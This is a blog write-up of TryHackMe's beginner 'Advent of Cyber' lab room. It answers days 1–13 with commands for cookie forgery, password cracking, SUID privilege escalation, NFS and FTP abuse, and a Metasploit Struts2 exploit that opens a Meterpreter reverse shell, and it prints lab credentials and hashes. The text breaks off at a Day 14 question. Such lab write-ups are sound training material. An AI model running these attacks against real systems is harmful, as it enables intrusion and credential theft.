---
layout: post
title: "Advent of Cyber - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - web
  - reverse
  - osint
  - forensics
date: 2020/12/01 20:34:00
updated: 2020/12/17 19:07:00
thumbnail: /images/TryHackMe/advent_of_cyber.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Advent of Cyber
- **Profile:** [tryhackme.com](https://tryhackme.com/room/25daysofchristmas)
- **Difficulty:** Easy
- **Description**: Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

![Advent of Cyber](/images/TryHackMe/advent_of_cyber.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S ffuf mariadb-clients nmap fingerprinter aws-extender-cli curl jq ruby-rubyzip hydra weevely
```

[Official Resources & material](https://github.com/horshark/thm_hacking_encyclopedia/blob/master/THM_hacking_encyclopedia.pdf)

## [Day 1] Inventory Management

> What is the name of the cookie used for authentication?

Answer: {% spoiler authid %}

- With Firefox: Press F12 and go in the _Storage_ Tabs then in the _Cookies_ folding menu
- With curl: Display HTTP headers `curl --head http://<your_machines_ip>:3000`

> If you decode the cookie, what is the value of the fixed part of the cookie?

Answer: {% spoiler v4er9ll1!ss %}

My users were named `a` and `b` so the cookie is `username` + `fix secret`

```
$ printf %s 'YXY0ZXI5bGwxIXNz' | base64 -d
av4er9ll1!ss

$ printf %s 'YnY0ZXI5bGwxIXNz' | base64 -d
bv4er9ll1!ss
```

> After accessing his account, what did the user mcinventory request?

Answer: {% spoiler firewall %}

So to connect with `mcinventory` we can craft the cookie:

```
$ printf %s 'mcinventoryv4er9ll1!ss' | base64
bWNpbnZlbnRvcnl2NGVyOWxsMSFzcw==
```

Then we can see entries on his profile.

## [Day 2] Arctic Forum

> What is the path of the hidden page?

Answer: {% spoiler `/sysadmin` %}

Enumerate folders with ffuf:

```
$ ffuf -u http://10.10.184.116:3000/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -ac

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.184.116:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

css                     [Status: 301, Size: 173, Words: 7, Lines: 11]
login                   [Status: 200, Size: 1713, Words: 368, Lines: 52]
admin                   [Status: 302, Size: 27, Words: 4, Lines: 1]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11]
logout                  [Status: 302, Size: 28, Words: 4, Lines: 1]
home                    [Status: 302, Size: 28, Words: 4, Lines: 1]
assets                  [Status: 301, Size: 179, Words: 7, Lines: 11]
.                       [Status: 301, Size: 169, Words: 7, Lines: 11]
sysadmin                [Status: 200, Size: 1733, Words: 381, Lines: 54]
:: Progress: [38267/38267] :: Job [1/1] :: 1294 req/sec :: Duration: [0:00:31] :: Errors: 0 ::
```

> What is the password you found?

Answer: {% spoiler `defaultpass` %}

On http://10.10.184.116:3000/sysadmin source code there is a comment:

```html
    <!--
    Admin portal created by arctic digital design - check out our github repo
    -->
```

Then we can use a basic google dork:

```
arctic digital design site:github.com
```

Here is the repo: https://github.com/ashu-savani/arctic-digital-design

Here is the README.md:

```markdown
# Arctic Digital Design
arctic digital design used for advent of cyber

Previous versions of this software have been shipped out. The credentials to log in are:
* username: admin
* password: defaultpass

** the login portal accepts usernames instead of emails **
```

> What do you have to take to the 'partay'

Answer: {% spoiler `Eggnog` %}

Logs with the creds on the sysadmin page.

There is a note:

> Hey all - Please don't forget to BYOE(Bring Your Own Eggnog) for the partay!!

## [Day 3] Evil Elf

> Whats the destination IP on packet number 998?

Answer: {% spoiler `63.32.89.195` %}

Rather than using Wireshark we can use its CLI utility and apply the same filters:

```
$ tshark -r Evil_Elf.pcap -Y 'frame.number==998' -T fields -e ip.dst
63.32.89.195
```

As a reference you can check my other WU using tshark:

- [Dyplesher - Write-up - HackTheBox](https://blog.raw.pm/en/HackTheBox-Dyplesher-write-up/)
- [TAMUctf 19 - Write-ups](https://blog.raw.pm/en/TamuCTF-2019-write-ups/#Open-ports)
- [Hexpresso FIC CTF 2020 Prequalification Round - Write-ups of step 1-2](https://blog.raw.pm/en/HexpressoCTF-2019-Quals-write-ups/)
- [Sunshine CTF 2018 - Write-ups](https://blog.raw.pm/en/Sunshine-CTF-2018-write-ups/#100-Data-Exfil-Forensics)
- [BSides San Francisco CTF 2017 - Write-ups](https://blog.raw.pm/en/BSides-San-Francisco-CTF-2017-write-ups/)
- [BITSCTF 2017 - Write-ups](https://blog.raw.pm/en/BITSCTF-2017-writeups/#50-Tom-and-Jerry-Forensics)

> What item is on the Christmas list?

Answer: {% spoiler `ps4` %}

Just using the right filter, nothing fancy:

```
$ tshark -r Evil_Elf.pcap -Y 'telnet' -T fields -e telnet.data
echo 'ps4' > christmas_list.txt\n
cat /etc/shadow\n
root:*:18171:0:99999:7:::\n,daemon:*:18171:0:99999:7:::\n,bin:*:18171:0:99999:7:::\n,sys:*:18171:0:99999:7:::\n,sync:*:18171:0:99999:7:::\n,games:*:18171:0:99999:7:::\n,man:*:18171:0:99999:7:::\n,lp:*:18171:0:99999:7:::\n,mail:*:18171:0:99999:7:::\n,news:*:18171:0:99999:7:::\n,uucp:*:18171:0:99999:7:::\n,proxy:*:18171:0:99999:7:::\n,www-data:*:18171:0:99999:7:::\n,backup:*:18171:0:99999:7:::\n,list:*:18171:0:99999:7:::\n,irc:*:18171:0:99999:7:::\n,gnats:*:18171:0:99999:7:::\n,nobody:*:18171:0:99999:7:::\n,systemd-network:*:18171:0:99999:7:::\n,systemd-resolve:*:18171:0:99999:7:::\n,syslog:*:18171:0:99999:7:::\n,messagebus:*:18171:0:99999:7:::\n,_apt:*:18171:0:99999:7:::\n,lxd:*:18171:0:99999:7:::\n,uuidd:*:18171:0:99999:7:::\n,dnsmasq:*:18171:0:99999:7:::\n,landscape:*:18171:0:99999:7:::\n,sshd:*:18171:0:99999:7:::\n,pollinate:*:18171:0:99999:7:::\n,ubuntu:!:18232:0:99999:7:::\n,buddy:$6$3GvJsNPG$ZrSFprHS13divBhlaKg1rYrYLJ7m1xsYRKxlLh0A1sUc/6SUd7UvekBOtSnSyBwk3vCDqBhrgxQpkdsNN6aYP1:18233:0:99999:7:::\n
```

> Crack buddy's password!

Answer: {% spoiler `rainbow` %}

A classic wordlist-based password cracking with JtR:

```
$ john hashes.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt
```

## [Day 4] Training

> How many visible files are there in the home directory(excluding ./ and ../)?

Answer: {% spoiler `8` %}

`ls -1` display one file or folder per line and `wc` will count the number of lines.

```
$ ssh mcsysadmin@10.10.152.127

[mcsysadmin@ip-10-10-152-127 ~]$ ls -1 | wc
```

> What is the content of file5?

Answer: {% spoiler `recipes` %}

Obvious:

```
$ [mcsysadmin@ip-10-10-152-127 ~]$ cat file5
```

> Which file contains the string 'password'?

Answer: {% spoiler `file6` %}

Let's use `grep` to search for content in files and `-n` option to display
from which file it matched.

```
[mcsysadmin@ip-10-10-152-127 ~]$ grep -rn password .
```

> What is the IP address in a file in the home folder?

Answer: {% spoiler `10.0.0.05` %}

You can find regexp for IP addresses online and the `-E` flag is for extended regexp
instead of string match.

```
$ [mcsysadmin@ip-10-10-152-127 ~]$ grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r .
```

> How many users can log into the machine?

Answer: {% spoiler `3` %}

Only user with a shell (here bash) can connect, other with entry point such as
`/usr/bin/nologin` are system accounts.

```
[mcsysadmin@ip-10-10-152-127 ~]$ cat /etc/passwd | grep bash | wc
```

> What is the sha1 hash of file8?

Answer: {% spoiler `fa67ee594358d83becdd2cb6c466b25320fd2835` %}

Obvious:

```
[mcsysadmin@ip-10-10-152-127 ~]$ sha1sum file8
```

> What is mcsysadmin's password hash?

Answer: {% spoiler `$6$jbosYsU/$qOYToX/hnKGjT0EscuUIiIqF8GHgokHdy/Rg/DaB.RgkrbeBXPdzpHdMLI6cQJLdFlS4gkBMzilDBYcQvu2ro/` %}

`locate` will search in the file index.

```
[mcsysadmin@ip-10-10-152-127 ~]$ locate shadow | grep bak
/var/shadow.bak
```

## [Day 5] Ho-Ho-Hosint

> What is Lola's date of birth? Format: Month Date, Year (e.g November 12, 2019)

Answer: {% spoiler `December 29, 1900` %}

Display EFIX metadata with exiftool:

```
$ exiftool thegrinch.jpg
ExifTool Version Number         : 12.00
File Name                       : thegrinch.jpg
Directory                       : .
File Size                       : 69 kB
File Modification Date/Time     : 2020:11:19 19:57:24+01:00
File Access Date/Time           : 2020:11:19 19:57:23+01:00
File Inode Change Date/Time     : 2020:11:19 19:57:24+01:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
XMP Toolkit                     : Image::ExifTool 10.10
Creator                         : JLolax1
Image Width                     : 642
Image Height                    : 429
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 642x429
Megapixels                      : 0.275
```

We found `JLolax1` in the metadata, let's find a social media account, eg.
twitter: https://twitter.com/jlolax1?lang=en

> What is Lola's current occupation?

Answer: {% spoiler `Santa's Helpers` %}

Answer from the only tweet.

> What phone does Lola make?

Answer: {% spoiler `iPhone X` %}

Answer from the only tweet.

> What date did Lola first start her photography? Format: dd/mm/yyyy

Answer: {% spoiler `23/10/2014` %}

She has a wordpress and we can browser on the WayBackMachine to see what is the
oldest snapshot that may contain the answer.

- https://lolajohnson1998.wordpress.com/
- https://web.archive.org/web/20191023204639/https://lolajohnson1998.wordpress.com/

Here is the post:

> I started as a freelance photographer five years ago today!

So date - 5 years is the answer.

> What famous woman does Lola have on her web page?

Answer: {% spoiler `Ada Lovelace` %}

Google image reverse search.

## [Day 6] Data Elf-iltration

> What data was exfiltrated via DNS?

Answer: {% spoiler `Candy Cane Serial Number 8491` %}

Extract DNS name from the queries, keep only the one from the target domain and
convert the hex to ASCII.

```
$ tshark -r holidaythief.pcap -Y 'dns' -T fields -e 'dns.qry.name' | grep holidaythief.com | uniq | xxd -r -p
```

> What did Little Timmy want to be for Christmas?

Answer: {% spoiler `PenTester` %}

Extract downloaded files:

WireShark > Export objects > HTTP > `christmaslists.zip`

Crack the password of the zip:

```
$ zip2john christmaslists.zip
$ john zip.hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
...
december         (christmaslists.zip)
...
$ unzip christmaslists.zip
Archive:  christmaslists.zip
[christmaslists.zip] christmaslistdan.tx password:
 extracting: christmaslistdan.tx
  inflating: christmaslistdark.txt
  inflating: christmaslistskidyandashu.txt
  inflating: christmaslisttimmy.txt
```

> What was hidden within the file?

Answer: {% spoiler `RFC527` %}

WireShark > Export objects > HTTP > `TryHackMe.jpg`

```
$ steghide extract -sf TryHackMe.jpg
Enter passphrase:
wrote extracted data to "christmasmonster.txt".
```

## [Day 7] Skilling Up

> how many TCP ports under 1000 are open?

Answer: {% spoiler `3` %}

Limit the ports with `-p`:

```
$ sudo nmap -sSVC -p 1-1000 10.10.19.20 -v
```

> What is the name of the OS of the host?

Answer: {% spoiler `linux` %}

Add the OS detection flag:

```
$ sudo nmap -O 10.10.19.20 -v
```

> What version of SSH is running?

Answer: {% spoiler `7.4` %}

From the first scan we added the service detection flag already.

> What is the name of the file that is accessible on the server you found running?

Answer: {% spoiler `interesting.file` %}

```
$ curl http://10.10.19.20:999
```

## [Day 8] SUID Shenanigans

> What port is SSH running on?

Answer: {% spoiler `65534` %}

```
$ sudo nmap -sSVC -p- 10.10.147.215 -v
```

> Find and run a file as igor. Read the file /home/igor/flag1.txt

Answer: {% spoiler `THM{d3f0708bdd9accda7f937d013eaf2cd8}` %}

Rather self-explanatory, just using the commands from the course material:

```
$ ssh holly@10.10.147.215 -p 65534

holly@ip-10-10-147-215:~$ find / -user igor -perm -4000 -exec ls -ldb {} \;
...
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find
-rwsr-xr-x 1 igor igor 2770528 Mar 31  2016 /usr/bin/nmap

holly@ip-10-10-147-215:~$ /usr/bin/find /home/igor/flag1.txt -exec cat /home/igor/flag1.txt \;
```

There is potentially a second option:

```
$ gtfoblookup linux shell nmap
nmap:

    shell:

        Description: Input echo is disabled.
        Code: TF=$(mktemp)
              echo 'os.execute("/bin/sh")' > $TF
              nmap --script=$TF

        Description: The interactive mode, available on versions 2.02 to
                     5.21, can be used to execute shell commands.
        Code: nmap --interactive
              nmap> !sh
```

> Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?

Answer: {% spoiler `THM{8c8211826239d849fa8d6df03749c3a2}` %}

Just using the commands from the course material:

```
holly@ip-10-10-147-215:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null;
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Aug 23  2019 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 26  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Aug 23  2019 /bin/mount
-rwsr-xr-x 1 root root 40152 May 15  2019 /snap/core/7396/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 May 15  2019 /snap/core/7396/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7396/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7396/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7396/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7396/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7396/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7396/usr/bin/sudo
-rwsr-xr-- 1 root systemd-network 42992 Jun 10  2019 /snap/core/7396/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7396/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Jul 12  2019 /snap/core/7396/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7396/usr/sbin/pppd
-rwsrwxr-x 1 root root 8880 Dec  7  2019 /usr/bin/system-control
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 Mar 26  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 39904 Mar 26  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 Mar 26  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 71824 Mar 26  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 23376 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 75304 Mar 26  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 84120 Apr  9  2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Aug 20  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device

holly@ip-10-10-147-215:~$ printf %s 'id' | /usr/bin/system-control

===== System Control Binary =====

uid=0(root) gid=1001(holly) groups=1001(holly)
Enter system command:

holly@ip-10-10-147-215:~$ printf %s 'cat /root/flag2.txt' | /usr/bin/system-control
```

## [Day 9] Requests

> What is the value of the flag?

Answer: {% spoiler `sCrIPtKiDd` %}

```ruby
#!/usr/bin/env ruby

require 'json'
require 'httpclient'

url = 'http://10.10.169.100:3000/'

clnt = HTTPClient.new
flag = ''

ans = clnt.get(url).body
json = JSON.parse(ans)
flag += json['value']
char = json['next']

until char == 'end'
  ans = clnt.get(url + char).body
  json = JSON.parse(ans)
  flag += json['value'] unless json['value'] == 'end'
  char = json['next']
end

puts flag
```

## [Day 10] Metasploit-a-ho-ho-ho

> Compromise the web server using Metasploit. What is flag1?

Answer: {% spoiler `THM{3ad96bb13ec963a5ca4cb99302b37e12}` %}

```
$ curl --head http://10.10.254.110/
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E0AE060E583BD0A1FB49C5EACDD2BEA; Path=/; HttpOnly
Location: showcase.action
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 22 Nov 2020 19:47:45 GMT
```

```
$ msfconsole -q
msf6 > use multi/http/struts2_content_type_ognl
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_content_type_ognl) > options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.254.110     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /showcase.action  yes       The path to a struts application action
   VHOST                        no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.19.77       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal

msf6 exploit(multi/http/struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 10.9.19.77:4444
[*] Sending stage (3008420 bytes) to 10.10.254.110
[*] Meterpreter session 1 opened (10.9.19.77:4444 -> 10.10.254.110:40250) at 2020-11-22 20:53:09 +0100

meterpreter >
```

```
$ id
uid=0(root) gid=0(root) groups=0(root)

$ find / -iname "*flag1*" 2>/dev/null
/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
```

> Now you've compromised the web server, get onto the main system. What is Santa's SSH password?

Answer: {% spoiler `rudolphrednosedreindeer` %}

List process:

```
$ ps -ef f
UID        PID  PPID  C STIME TTY      STAT   TIME CMD
root         1     0  0 19:34 ?        Ssl    0:15 /docker-java-home/jre/bin/java -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.endorsed.dirs=/usr/local/tomcat/endorsed -classpath /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp org.apache.catalina.startup.Bootstrap start
root        50     1  0 19:53 ?        S      0:00 /usr/local/tomcat/temp/Vdgl8163552743262842558.exe
root        52    50  0 19:54 ?        S      0:00  \_ /bin/sh
root        81    52  0 20:09 ?        R      0:00      \_ ps -ef f

$ ls -lhA /.dockerenv
-rwxr-xr-x 1 root root 0 Nov 22 19:34 /.dockerenv
```

There is not a lot of process, we may be inside a docker container.

```
$ cat /home/santa/ssh-creds.txt
```

> Who is on line 148 of the naughty list?

Answer: {% spoiler `Melisa Vanhoose` %}

```
$ ssh santa@10.10.254.110
[santa@ip-10-10-254-110 ~]$ head -148 naughty_list.txt | tail -1
```

> Who is on line 52 of the nice list?

Answer: {% spoiler `Lindsey Gaffney` %}

```
[santa@ip-10-10-254-110 ~]$ head -52 nice_list.txt | tail -1
```

## [Day 11] Elf Applications

> What is the password inside the creds.txt file?

Answer: {% spoiler `securepassword123` %}

```
$ sudo nmap -sSVC -p- 10.10.37.5 -v
...
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 14:6f:fc:4d:82:43:eb:e9:6e:f3:0e:01:38:f0:cb:23 (RSA)
|   256 83:33:03:d0:b4:1d:cb:8e:59:6f:13:14:c5:a2:75:b3 (ECDSA)
|_  256 ec:b1:63:c0:6d:98:fd:be:76:31:cd:b9:78:35:2a:bf (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34089/tcp6  nlockmgr
|   100021  1,3,4      34461/udp6  nlockmgr
|   100021  1,3,4      38253/tcp   nlockmgr
|   100021  1,3,4      38594/udp   nlockmgr
|   100024  1          45209/tcp   status
|   100024  1          45851/tcp6  status
|   100024  1          45934/udp6  status
|   100024  1          46122/udp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
3306/tcp  open  mysql    MySQL 5.7.28
| mysql-info:
|   Protocol: 10
|   Version: 5.7.28
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, Speaks41ProtocolOld, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, InteractiveClient, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: ^\x0E/' #\x12f\x037I#_R\\x19RK5\x1A
|_  Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.28_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_5.7.28_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-12-10T23:10:36
| Not valid after:  2029-12-07T23:10:36
| MD5:   aac5 77b5 16cb e816 8de8 a245 96c9 9537
|_SHA-1: d1a1 0cbd a01d 636d 38a5 fd9c a908 e657 3ea1 0045
|_ssl-date: TLS randomness does not represent time
20048/tcp open  mountd   1-3 (RPC #100005)
38253/tcp open  nlockmgr 1-4 (RPC #100021)
45209/tcp open  status   1 (RPC #100024)
Service Info: OS: Unix
...
```

Exploiting the unprotected NFS:

```
$ showmount -e 10.10.37.5
Export list for 10.10.37.5:
/opt/files *

$ sudo mount 10.10.37.5:/opt/files /mnt

$ cat /mnt/creds.txt
```

> What is the name of the file running on port 21?

Answer: {% spoiler `file.txt` %}

Classic FTP:

```
$ ftp 10.10.37.5
Connected to 10.10.37.5.
220 (vsFTPd 3.0.2)
Name (10.10.37.5:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
```

> What is the password after enumerating the database?

Answer: {% spoiler `bestpassword` %}

Classic MySQL:

```
$ cat file.txt
remember to wipe mysql:
root
ff912ABD*

$ mysql -h 10.10.37.5 -u root -p
MySQL [(none)]> show databases;
MySQL [data]> show tables;
MySQL [data]> SELECT * FROM USERS;
```

## [Day 12] Elfcryption

> What is the md5 hashsum of the encrypted note1 file?

Answer: {% spoiler `24cf615e2a4f42718f2ff36b35614f8f` %}

Decompress:

```
$ 7z l tosend.zip
...
--
Path = tosend.zip
Type = zip
Physical Size = 7075

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2019-12-11 23:16:52 .....          128          128  note1.txt.gpg
2019-12-11 23:17:00 .....         1114         1114  note2_encrypted.txt
2019-12-11 23:17:05 .....         7011         5341  private.key
------------------- ----- ------------ ------------  ------------------------
2019-12-11 23:17:05               8253         6583  3 files

$ 7z x tosend.zip

$ md5sum note1.txt.gpg
```

> Where was elf Bob told to meet Alice?

Answer: {% spoiler `Santa's Grotto` %}

Decrypt the message:

```
$ gpg -d note1.txt.gpg
```

Password: `25daysofchristmas` (name of the room, given as hint)

> Decrypt note2 and obtain the flag!

Answer: {% spoiler `THM{ed9ccb6802c5d0f905ea747a310bba23}` %}

Decrypt using the private key:

```
$ openssl rsautl -decrypt -inkey private.key -in note2_encrypted.txt -out decrypted.txt
```

Password: `hello` (given as hint)

## [Day 13] Accumulate

> A web server is running on the target. What is the hidden directory which the website lives on?

Answer: {% spoiler `/retro` %}

Service scan:

```
$ sudo nmap -sSVC -p- 10.10.156.157 -v -Pn
...
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2020-11-26T18:23:54+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Issuer: commonName=RetroWeb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-25T17:56:50
| Not valid after:  2021-05-27T17:56:50
| MD5:   b81c d8fe 07e4 9239 ea26 b685 7322 d6d0
|_SHA-1: e4c3 d748 319e 7319 490d e686 37e6 2409 4725 12fb
|_ssl-date: 2020-11-26T18:23:55+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
...
```

Classic web enumeration:

```
$ ffuf -u http://10.10.156.157/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -ac
...
retro                   [Status: 301, Size: 150, Words: 9, Lines: 2]
...
```

> Gain initial access and read the contents of user.txt

Answer: {% spoiler `THM{HACK_PLAYER_ONE}` %}

Enumerate files & find the version of wordpress:

```
$ ffuf -u http://10.10.156.157/retro/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -ac
...
wp-login.php            [Status: 200, Size: 2743, Words: 152, Lines: 69]
...

$ fingerprinter -a wordpress -f http://10.10.156.157/retro
...
Very likely to be v5.2.1
```

The author of the blog is named `wade`.

There is an article explaining why he choose this username: http://10.10.156.157/retro/index.php/2019/12/09/ready-player-one/

> I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!

There is also a comment with probably the password:

> Leaving myself a note here just in case I forget how to spell it: parzival

We can use `wade` / `parzival` credentials over RDP (3389) with Remmina.

> [Optional] Elevate privileges and read the content of root.txt

Answer: {% spoiler `THM{COIN_OPERATED_EXPLOITATION}` %}

There is `hhupd.exe` on the desktop.

[PayloadsAllTheThings - CVE-2019-1388 - Windows EoP with `hhupd.exe`](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#cve-2019-1388)

Details of the exploitation on [ZDI - Thanksgiving Treat: Easy-as-Pie Windows 7 Secure Desktop Escalation of Privilege](https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege).

## [Day 14] Unknown Storage

> What is the name of the file you found?

